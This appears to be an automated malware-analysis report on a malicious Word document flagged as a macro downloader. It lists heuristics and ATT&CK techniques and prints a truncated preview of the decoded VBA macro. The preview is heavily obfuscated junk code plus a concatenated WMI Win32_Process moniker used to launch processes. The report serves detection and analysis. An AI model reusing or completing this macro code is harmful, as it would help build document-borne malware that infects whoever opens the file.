Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro uses GetObject and CreateObject to launch a Win32_Process via WMI, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Sagent-6865730-0' further supports its downloader functionality.
Heuristics (8)

- ClamAV: Doc.Downloader.Sagent-6865730-0 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Sagent-6865730-0
- VBA macros detected | medium | OLE_VBA_MACROS (4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher | critical | OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro | high | OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call | high | OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73920 bytes | 543df201e154a7e5e149423ff87c08bc9efb8af544f2255ade6404ee982a999e |

Preview script (first 1,000 lines of the extracted script; cut short in this report):

```vb
Attribute VB_Name = "d_55582"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "u578_35"
Function J_071_2()
Select Case D8__1942
Case 919821255
c3_81069 = Log(O46_531)
R46_902 = CDate(303006668)
G27_337 = Fix(134800971 + 490004281 + G3_7_46_ - Oct(690724736))
B51834 = Cos(167769966 - Sqr(827199426 - Atn(899264519)) - 390785565 + 571731060)
End Select
Select Case a276_51
Case 862525990
X5__3_9_ = Log(J4_3548)
T7_8_4 = CDate(844821985)
a1_0_123 = Fix(755522482 + 567295198 + X7905464 - Oct(59201586))
w0268_29 = Cos(357613928 - Sqr(763647121 - Atn(646615408)) - 379432067 + 760313778)
End Select
Select Case t182080_
Case 55459924
i_0037 = Log(j24757)
Z40_97 = CDate(957781610)
b_0_052 = Fix(245917534 + 574522705 + j88__7_ - Oct(771312551))
K074395 = Cos(413472210 - Sqr(710402810 - Atn(139800331)) - 802763884 + 839194534)
End Select
Select Case O_97_01
Case 909950347
j_46_0 = Log(R_667_)
W959728 = CDate(772975370)
J_5260 = Fix(116315584 + 321471410 + T580__2 - Oct(941022641))
N047479_ = Cos(847859673 - Sqr(572905860 - Atn(238966803)) - 463850504 + 577310050)
End Select
Select Case H76820
Case 232446402
R38013 = Log(N_0_69)
B51_12 = CDate(266239108)
d63_86 = Fix(612176945 + 333905745 + H67268_6 - Oct(746254369))
n__625 = Cos(207402843 - Sqr(478524385 - Atn(62240685)) - 227596899 + 928381140)
End Select
Select Case M88460_
Case 730606569
q_9287 = Log(f72811)
s972_731 = CDate(330096443)
W_901_ = Fix(91093977 + 723583660 + Y0573_3 - Oct(551401447))
Y46_341 = Cos(432854635 - Sqr(361071142 - Atn(562378402)) - 536506012 + 755021772)
End Select
Select Case X_456_4
Case 953822514
j01__09 = Log(w828538)
c9_8577_ = CDate(604708549)
S5326_ = Fix(634709857 + 158927921 + H110_167 - Oct(934254673))
Q6659258 = Cos(315109944 - Sqr(131473558 - Atn(63561632)) - 517596910 + 897692964)
End Select
End Function
Function O_272__5(u_77150, z2986_1)
On Error Resume Next
Select Case j44_906
Case 889628614
F58273 = Log(L8190__7)
t_97_0 = CDate(50222817)
F293_240 = Fix(305701092 + 567346086 + C2_1_518 - Oct(522291888))
S51260 = Cos(416674561 - Sqr(854002665 - Atn(65882325)) - 96496285 + 427295667)
End Select
Select Case m67379
Case 960835129
G_4_51 = Log(b_0__9)
h1_84856 = CDate(541114764)
B11780 = Fix(30517756 + 523410580 + U7305888 - Oct(380754407))
Z6_922_9 = Cos(569615878 - Sqr(836261759 - Atn(452526442)) - 789279759 + 22659213)
End Select
Select Case Y46_99
Case 114308441
Q_7__167 = Log(W_29__)
V92065 = CDate(54522447)
w09091_4 = Fix(189607205 + 32447166 + b78616 - Oct(64437251))
c_590_9 = Cos(670442440 - Sqr(452011817 - Atn(121285814)) - 686350208 + 32596726)
End Select
R97851_ = Q8__569_ + "winmgmts:Win32" + "_ProcessStartup" + t3845__5
Select Case B5_597
Case 196204263
k61_8633 = Log(n_6053_)
C21453 = CDate(274186804)
t6_584__ = Fix(454628749 + 8088369 + U92__599 - Oct(400765649))
I309030 = Cos(694984521 - Sqr(269326447 - Atn(781471853)) - 432758859 + 302360341)
End Select
Select Case P2__6_
Case 329189795
t904_92_ = Log(Y07_806)
Z8759087 = CDate(294901860)
s14212 = Fix(681219842 + 891963203 + q591_5 - Oct(841855981))
Q_90276 = Cos(233481
```

... (truncated)